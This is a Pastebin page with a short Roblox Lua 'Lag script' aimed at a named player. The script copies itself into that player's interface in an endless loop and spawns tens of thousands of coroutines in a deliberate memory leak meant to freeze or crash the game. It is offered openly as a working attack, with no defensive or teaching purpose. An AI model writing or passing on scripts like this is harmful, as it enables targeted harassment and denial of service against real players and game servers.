Advertisement
dylan12312

Untitled

Apr 9th, 2018
78
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.57 KB | None | 0 0
  1. ---{leolion003 - Lag script)---
  2.  
  3. local plr = game.Players.Gamer_pod
  4. local rs = game:GetService("RunService")
  5.  
  6. function lag()
  7. while true do
  8. script:clone().Parent = plr.PlayerGui
  9. print("Rest in peace.")
  10. end
  11. end
  12.  
  13. function memoryLeak()
  14. for i = 1, 50000 do
  15. coroutine.resume(coroutine.create(function()
  16. for i = 1, 50000 do
  17. spawn(lag)
  18. end
  19. end))
  20. end
  21. end
  22.  
  23. while true do
  24. spawn(memoryLeak)
  25. end
  26.  
  27. while true do
  28. m = Instance.new("Message", workspace)
  29. m.Text = "GoodBye"
  30. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement